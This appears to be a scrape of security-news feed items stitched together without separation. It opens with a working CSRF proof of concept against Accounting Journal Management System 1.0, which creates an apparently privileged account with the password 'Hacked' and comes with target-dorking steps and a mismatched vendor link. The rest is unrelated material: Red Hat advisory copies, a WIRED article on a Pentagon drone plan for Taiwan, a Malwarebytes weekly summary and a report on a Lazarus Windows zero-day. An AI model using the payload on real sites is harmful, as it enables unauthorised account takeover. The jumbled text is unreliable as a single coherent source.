Accounting Journal Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Accounting Journal Management System 1.0 CSRF Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.  [+] Line 6 : Set your target url[+] Line 15 + 19 : Set user & pass[+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Accounting Journal Management System 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-5547-03 - Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.1 on Red Hat Enterprise Linux 9 from Red Hat Container Registry. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5547.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift Data Foundation 4.16.1 bug fix and security update  
Advisory ID:        RHSA-2024:5547-03  
Product:            Red Hat OpenShift Data Foundation  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5547  
Issue date:         2024-08-19  
Revision:           03  
CVE Names:          CVE-2024-6104  
====================================================================

Summary: 

Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.1 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an S3-compatible API.

Security Fix(es):  
* golang: net: malformed DNS message can cause infinite loop (CVE-2024-24788)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)  
* go-retryablehttp: url might write sensitive information to log file (CVE-2024-6104)  
* nodejs-ws: denial of service when handling a request with many HTTP headers (CVE-2024-37890)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-6104

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/cve/CVE-2024-24788  
https://access.redhat.com/security/cve/CVE-2024-6104  
https://access.redhat.com/security/cve/CVE-2024-37890  
https://access.redhat.com/security/cve/CVE-2024-24790  
https://bugzilla.redhat.com/show_bug.cgi?id=2231151  
https://bugzilla.redhat.com/show_bug.cgi?id=2274165  
https://bugzilla.redhat.com/show_bug.cgi?id=2279814  
https://bugzilla.redhat.com/show_bug.cgi?id=2292777  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://bugzilla.redhat.com/show_bug.cgi?id=2294407  
https://bugzilla.redhat.com/show_bug.cgi?id=2297946  
https://bugzilla.redhat.com/show_bug.cgi?id=2298656  
https://bugzilla.redhat.com/show_bug.cgi?id=2298718  
https://bugzilla.redhat.com/show_bug.cgi?id=2299443  
https://bugzilla.redhat.com/show_bug.cgi?id=2301880  
https://bugzilla.redhat.com/show_bug.cgi?id=2302238  
https://bugzilla.redhat.com/show_bug.cgi?id=2303080

Red Hat Security Advisory 2024-5547-03

Red Hat Security Advisory 2024-5537-03 - An update is now available for the Red Hat build of Cryostat 3 on RHEL 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5537.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat build of Cryostat security updateAdvisory ID:        RHSA-2024:5537-03Product:            CryostatAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5537Issue date:         2024-08-19Revision:           03CVE Names:          CVE-2024-24791====================================================================Summary: An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.Security Fix(es):* golang: net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-24791References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2295310

Red Hat Security Advisory 2024-5537-03

Red Hat Security Advisory 2024-5535-03 - An update for python3.9 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a traversal vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5535.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3.9 security updateAdvisory ID:        RHSA-2024:5535-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5535Issue date:         2024-08-19Revision:           03CVE Names:          CVE-2023-6597====================================================================Summary: An update for python3.9 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6597References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2276518

Red Hat Security Advisory 2024-5535-03

Red Hat Security Advisory 2024-5534-03 - An update for python-setuptools is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5534.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-setuptools security updateAdvisory ID:        RHSA-2024:5534-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5534Issue date:         2024-08-19Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python-setuptools is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-setuptools package provides a collection of enhancements to Python distribution utilities allowing convenient building and distribution of Python packages.Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-5534-03

Red Hat Security Advisory 2024-5533-03 - An update for python3.12-setuptools is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5533.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3.12-setuptools security updateAdvisory ID:        RHSA-2024:5533-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5533Issue date:         2024-08-19Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python3.12-setuptools is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Setuptools is a collection of enhancements to the Python 3 distutils that allow you to more easily build and distribute Python 3 packages, especially ones that have dependencies on other packages.  This package also contains the runtime components of setuptools, necessary to execute the software that requires pkg_resources.Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-5533-03

An adversary could exploit these vulnerabilities by injecting malicious libraries into Microsoft's applications to gain their entitlements and user-granted permissions.

How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions

The US Defense Department’s grand strategy for protecting Taiwan from a massive Chinese military offensive involves flooding the zone with thousands of drones.

It has become conventional wisdom among the halls of the United States government that China will launch a full-scale invasion of Taiwan within the next few years. And when that happens, the US military has a relatively straightforward response in mind: Unleash hell.

Speaking to The Washington Post on the sidelines of the International Institute for Strategic Studies’ annual Shangri-La Dialogue in June, US Indo-Pacific Command chief Navy Admiral Samuel Paparo colorfully described the US military’s contingency plan for a Chinese invasion of Taiwan as flooding the narrow Taiwan Strait between the two countries with swarms of thousands upon thousands of drones, by land, sea, and air, to delay a Chinese attack enough for the US and its allies to muster additional military assets in the region.

“I want to turn the Taiwan Strait into an unmanned hellscape using a number of classified capabilities,” Paparo said, “so that I can make their lives utterly miserable for a month, which buys me the time for the rest of everything.”

Cheap, easily weaponizable drones have transformed battlefields from Ukraine to the Middle East in recent years, and the US military is rapidly adapting to this new uncrewed future. While Paparo isn’t the first to invoke the image of a robotic “hellscape” with regards to Taiwan (his predecessor, Admiral John Aquilino had previously used the term in August 2023), his comments offer the most vivid description of the Defense Department’s plan for dealing with Chinese aggression toward the US ally. In recent months, new details have started to draw out the contours of what, exactly, this “hellscape” would look like.

**A Great Wall of Drones**

China has undertaken a major military buildup ahead of what American defense leaders see as an imminent attempt to annex Taiwan, which Beijing sees as a breakaway province. According to a June analysis from the Center for Strategic & International Studies, the People’s Liberation Army Navy now boasts the largest maritime force on the planet, with 234 warships to the US Navy’s fleet of 219; testifying before the Senate Armed Services Committee in March, then-INDOPACOM boss Aquilino stated that the PLA Air Force also now has the largest number of warplanes in the region (not counting uncrewed systems), with designs on soon surpassing the US and Russian air fleets.

While the exact size of the Chinese military’s arsenal of uncrewed vehicles is difficult to estimate, the country has become the leading exporter of armed combat drones around the world over the past decade (along with Turkey), according to data from the Stockholm International Peace Research Institute. And when it comes to the consumer drones that are converted into weapons of war by soldiers on the front lines, Chinese drone giant Da-Jiang Innovations (better known in the US as DJI) controls three-quarters of that market, according to The Wall Street Journal. While the US and China may appear locked in an military drone arms race, the latter currently possess a significant advantage.

“China has essentially copied all of the large and medium high-altitude drones the US has and produced what amount to cheaper versions of the MQ-9 Reaper or the \[RQ-4\] Global Hawk,” Stacie Pettyjohn tells WIRED. A senior fellow and director of defense programs at the Center for a New American Security, Pettyjohn is the lead author of the June report “Swarms Over the Strait” on the role of drones in a future conflict over Taiwan. “Potentially more concerning is the smaller drones that don’t have to fly as far and can be launched from mainland China, of which the Chinese military has many.”

Simply put, China has a lot of drones and can make a lot more drones quickly, creating a likely advantage during a protracted conflict. “This stands in contrast to American and Taiwanese forces, who do not have large inventories of drones or the right mix of drones to successfully defeat a Chinese invasion,” Pettyjohn and her coauthors write in the CNAS report.

Apart from beefing up Taiwan’s counter-drone defenses, the Pentagon’s “hellscape” plan proposes that the US military make up for this growing gap by producing and deploying what amounts to a massive screen of autonomous drone swarms designed to confound enemy aircraft, provide guidance and targeting to allied missiles, knock out surface warships and landing craft, and generally create enough chaos to blunt (if not fully halt) a Chinese push across the Taiwan Strait. Networked drones will not just strike adversaries but also provide critical intelligence, surveillance, and reconnaissance functions to fill the gaps between satellite imaging and crewed overflights, ostensibly allowing the US and its allies to develop a more complete picture of the battlefield as it evolves.

“A 2020 Rand Corporation report concludes that hundreds of networked, low-cost drones could guide American long-range anti-ship missiles toward a Chinese invasion fleet and would be a key capability needed to defeat China and successfully defend Taiwan,” the CNAS report says. “Similarly, proponents of air denial strategy argue that using ‘sufficiently large numbers of smaller, cheaper weapons,’ including ground-based air defenses and drone swarms, ‘in a distributed way’ would prevent China from gaining air superiority.”

As Pettyjohn points out to WIRED, the concept of Taiwan using densely layered defenses to inflict incredibly high losses on an invading Chinese force isn’t new, with past visions of a “porcupine strategy” built on missiles and mines as deterrents to an outright invasion. But the incorporation of massive drone fleets adds a new layer to the fight. Indeed, war games conducted by the US Air Force and defense think tanks like Rand over the past several years have pointed to the critical role drone swarms could play in potentially thwarting an invasion of Taiwan.

According to the CNAS report, this strategy appears to have been sharpened by recent lessons from Russia’s invasion of Ukraine, where the Ukrainian military has successfully deployed drones against the superiorly numbered and equipped Russian force to disrupt enemy formations, destroy armored vehicles, and even neutralize surface combatants. Look no further than the Black Sea, where Ukrainian forces have managed to destroy 26 Russian vessels and forced Moscow’s vaunted Black Sea Fleet to a safe harbor hundreds of miles away using missiles, kamikaze UAVs, and explosive-laden drone boats.

The CNAS report makes several recommendations for how the Pentagon can best employ drones to defend Taiwan, emphasizing the need to build a “diverse” fleet of UAVs encompassing “a mix of higher-end and cheaper systems” (the large and expensive Reaper versus low-cost single-use kamikaze drones, for example), investing in the development of autonomous drone boats for attacking larger surface warships, and pre-positioning short- and medium-range drones on Taiwan for a rapid, immediate response to a Chinese invasion.

“In addition to acquiring ‘good enough’ long-range drones for target acquisition and strike, the United States should have a smaller number of stealthy drones that can conduct surveillance in highly contested airspace and provide targeting information for standoff missile strikes,” the report says, adding that “affordable kamikaze drones with relatively simple autonomy could overwhelm the Chinese navy’s air defenses and damage or destroy the invasion fleet.”

**Engage the Replicator**

With a potential invasion looming, the Pentagon has kicked efforts to make its vision of a “hellscape” into high gear. Last August, deputy secretary of defense Kathleen Hicks announced the department’s new Replicator initiative, designed to build and field “attritable autonomous systems”—DOD-speak for disposable, AI-enabled drones—“at scale of multiple thousands, in multiple domains” within the next 18 to 24 months. As of March, the Pentagon had earmarked $1 billion across its fiscal-year 2024 and 2025 budgets for its first round of Replicator systems, as USNI News reported.

Replicator appears to be doing its job already. In May, the Pentagon announced its first tranche of fresh capabilities, which includes the accelerated fielding of more than 1,000 of defense contractor AeroVironment’s Switchblade-600 loitering munitions—a man-portable missile that circles over targets before dive-bombing them at the right moment—in the next year, as well as the procurement of uncrewed “interceptor” surface vessels under the department’s new Production-Ready, Inexpensive, Maritime Expeditionary (Prime) effort. According to a DOD solicitation released in January, the Prime drone boats will purportedly be capable of “autonomously transiting hundreds of miles through contested waterspace, loitering in an assigned operating area while monitoring for maritime surface threats, and then sprinting to interdict a noncooperative, maneuvering vessel.” The first Replicator systems were already deployed to the Indo-Pacific, according to Hicks, with some military units training with cheap drones produced under the initiative as of August.

"This is just the beginning," Admiral Christopher Grady, vice chairman of the Joint Chiefs of Staff, said in a May statement. "Replicator is helping us jump-start the delivery of critical capabilities at scale.

Replicator isn’t the US military’s only effort to incorporate uncrewed weapons platforms into its formations. The Army has asked for $120.6 million as part of its fiscal-year 2025 budget request for Low Altitude Stalking and Strike Ordnance (Lasso) semiautonomous loitering munitions to outfit infantry brigade combat teams with the capability. As of April, the Marine Corps has selected three defense contractors (AeroVironment, defense upstart Anduril, and Teledyne FLIR) to compete for a potential $249 million contract to furnish Marines with so-called Organic Precision Fires-Light kamikaze drone swarms (to say nothing of the Corps’ push to acquire Long Range Attack Missile air-launched loitering munition). US Special Operations Command, an early adopter of loitering munitions, now wants to outfit its fleet of aircraft with air-launched systems. And as for the maritime realm, the Marine Corps has been experimenting with uncrewed surface vessels bristling with Uvision Hero-120 kamikaze drone launchers, while the Navy has been eyeing missile-hauling drone boats as potential escorts for transport ships, among other lethal initiatives, after years of experimenting with uncrewed surface vessels as waterborne sensor nodes.

Beyond expanding its arsenal of uncrewed systems, the US is also working to bolster Taiwan’s own drone capabilities. In June, the State Department announced the approval of a $360 million weapons sale to Taipei that included 291 ALTIUS 600M-V kamikaze drones produced by Anduril and 720 Switchblade-300 loitering munitions. As the CNAS report notes, the integration of these one-way attack drones into Taiwanese military formations, when deployed in conjunction with explosive-laden drone boats and anti-ship missiles, could potentially prevent Chinese warships from ever reaching the country’s shores in a similar manner to how Ukrainian forces have denied the Russian military control over the Black Sea.

“Taiwan needs a lot of these systems and needs them quickly to incorporate them into broader tactics and formations” as effectively as the Ukrainians have, Pettyjohn says.

And this is just the beginning: The Taiwanese government plans to procure nearly 1,000 additional AI-enabled attack drones in the next year, according to Taipei Times, with long-standing plans to expand indigenous production of homegrown capabilities to prevent backlogs in weapons transfers from the United States—and, more importantly, ease reliance on Chinese-made commercial off-the-shelf parts. (Although, as Pettyjohn points out, the Taiwanese defense community itself isn’t totally unified around the “hellscape” plan in the first place.)

Access to commercial drones “is where Taiwan is most disadvantaged” because of DJI’s relative dominance of the market, Pettyjohn says, noting that “even if Taiwan had Chinese drones available to them, they would have to hack in to each system to ensure they can’t be tracked by DJI or don’t have similar vulnerabilities.”

“Consider that for most of the first-person-view kamikaze drones used in Ukraine right now, all of those components are sourced from China,” she adds. “Even Ukraine has tried to wean itself off Chinese sources and hasn’t found anything at a comparable price point.”

**Mass-Producing Hell**

Planning a “hellscape" of hundreds of thousands of drones is one thing, but actually making it a reality is another. An April 2023 assessment from the Rand Corporation indicated that rising demand for weaponized drones would likely “strain” the capacity of the existing US defense industrial base. Similarly, a separate CNAS report from June 2023 argued that the war in Ukraine (and the US government’s role as a major provider of security assistance to Kyiv) has “shed light on serious deficiencies” in the Pentagon’s ability to rapidly scale production of “key weapons” like precision-guided munitions compared to Russia—a problem echoed in the most recent CNAS report’s assessment of the US government’s approach to Taiwan’s defense.

“Ukraine consistently has pioneered new approaches to drone warfare, but Russia has rapidly adapted and scaled drone production in a way that Ukraine cannot match,” the June 2024 CNAS report says. “Technological and tactical innovations are necessary but not sufficient. Mass production of an affordable mix of drones is also needed to support a large and likely protracted conflict.”

The report adds that the US defense industrial based may not be “ currently capable of producing the quantities of drones needed for a war with China.”

Like Russia, China’s autocratic regime has enabled the country’s defense industrial base to rapidly accelerate weapons R&D and production, so far that Beijing is “heavily investing in munitions and acquiring high-end weapons systems and equipment five to six times faster than the United States,” as a March comparison from CSIS put it. By contrast, the US defense industrial ecosystem has over the past several decades consolidated into a handful of large “prime” contractors like Lockheed Martin and Raytheon, a development that threatens to not only stifle innovation but hamstring the production of critical systems needed for the next big war.

“Overall, the US defense industrial ecosystem lacks the capacity, responsiveness, flexibility, and surge capability to meet the US military’s production and war-fighting needs,” the CSIS report says. “Unless there are urgent changes, the United States risks weakening deterrence and undermining its war-fighting capabilities.”

To that end, the latest CNAS report recommends that the Pentagon and Congress work to foster both the commercial and military drone industrial base “to scale production and create surge capacity” to quickly replace drones lost in a future conflict. While the Pentagon has, with regards to Ukraine, relied on multi-year and large-lot procurement programs to source munitions from large “primes” and “\[provide\] industry with the stability it needs to expand production capacity,” as the 2023 CNAS report put it, the Replicator initiative is explicitly designed to not only further provide that stability to drone makers but also to pull in “nontraditional” defense industry players—startups like Anduril or drone boat maker Saronic, the latter of which recently received $175 million in Series B funding to scale up its manufacturing capacity.

Replicator “provides the commercial sector with a demand signal that allows companies to make investments in building capacity, strengthening both the supply chain and the industrial base,” according to the Defense Innovation Unit, the Pentagon organ responsible for capitalizing on emerging commercial technologies. “Replicator investments incentivize traditional and non-traditional industry players to deliver record volumes of all domain attritable autonomous systems in line with the ambitious schedule set forth by the deputy secretary of defense.”

“It comes down to contracts,” Pettyjohn says. “Where Replicator is potentially most impactful is where the Pentagon buys something they keep for a few years before they get something new for a different mission set so the DOD isn’t keeping a system in their inventory for decades. Establishing those practices, getting those contracts out there, and getting enough money into it so there’s competition and resiliency within industry is really needed to fuel innovation and provide the capabilities that are needed.”

It’s unclear whether the United States will actually be ready to defend Taiwan when the moment arrives; as legendary Prussian military commander Helmuth von Moltke is famously quoted as saying, “no plan survives first contact with the enemy.” But with the right preparation, funding, and training (and a little luck), the Pentagon and its Taiwanese partners may end up successfully throwing a wrench in China’s suspected invasion plans by flooding the zone with lethal drones. War is hell, but when the next big conflict in the Indo-Pacific rolls around, the US wants to guarantee that it will be an absolute hellscape—for the Chinese military, at least.

The Pentagon Is Planning a Drone ‘Hellscape’ to Defend Taiwan

A list of topics we covered in the week of August 12 to August 18 of 2024

August 15, 2024 - In a clever scheme designed to abuse Google in more than one way, scammers are redirecting users to browser locks.

August 15, 2024 - A researcher used two Windows vulnerabilities to perform downgrade attacks. These flaws have now been patched by Microsoft

August 14, 2024 - Announcing our new identity module for Malwarebytes.

August 14, 2024 - Privacy watchdog NOYB has filed complaints against X for using social media data to train its AI chatbot Grok.

August 13, 2024 - Malwarebytes has been awarded the Parent Tested Parent Approved Seal of Approval for product excellence.

 A week in security (August 12 &#8211; August 18) 

A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea.
The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock.
"An attacker who successfully exploited this

A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea.

The security vulnerability, tracked as **CVE-2024-38193** (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said in an advisory for the flaw last week. It was addressed by the tech giant as part of its monthly Patch Tuesday update.

Credited with discovering and reporting the flaw are Gen Digital researchers Luigino Camastra and Milánek. Gen Digital owns a number of security and utility software brands like Norton, Avast, Avira, AVG, ReputationDefender, and CCleaner.

"This flaw allowed them to gain unauthorized access to sensitive system areas," the company disclosed last week, adding it discovered the exploitation in early June 2024. "The vulnerability allowed attackers to bypass normal security restrictions and access sensitive system areas that most users and administrators can't reach."

The cybersecurity vendor further noted that the attacks were characterized by the use of a rootkit called FudModule in an attempt to evade detection.

While the exact technical details associated with the intrusions are presently unknown, the vulnerability is reminiscent of another privilege escalation that Microsoft fixed in February 2024 and was also weaponized by the Lazarus Group to drop FudModule.

Specifically, it entailed the exploitation of CVE-2024-21338 (CVSS score: 7.8), a Windows kernel privilege escalation flaw rooted in the AppLocker driver (appid.sys) that makes it possible to execute arbitrary code such that it sidesteps all security checks and runs the FudModule rootkit.

Both these attacks are notable because they go beyond a traditional Bring Your Own Vulnerable Driver (BYOVD) attack by taking advantage of a security flaw in a driver that's already installed on a Windows host as opposed to "bringing" a susceptible driver and using it to bypass security measures.

Previous attacks detailed by cybersecurity firm Avast revealed that the rootkit is delivered by means of a remote access trojan known as Kaolin RAT.

"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem," the Czech company said at the time, stating "Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability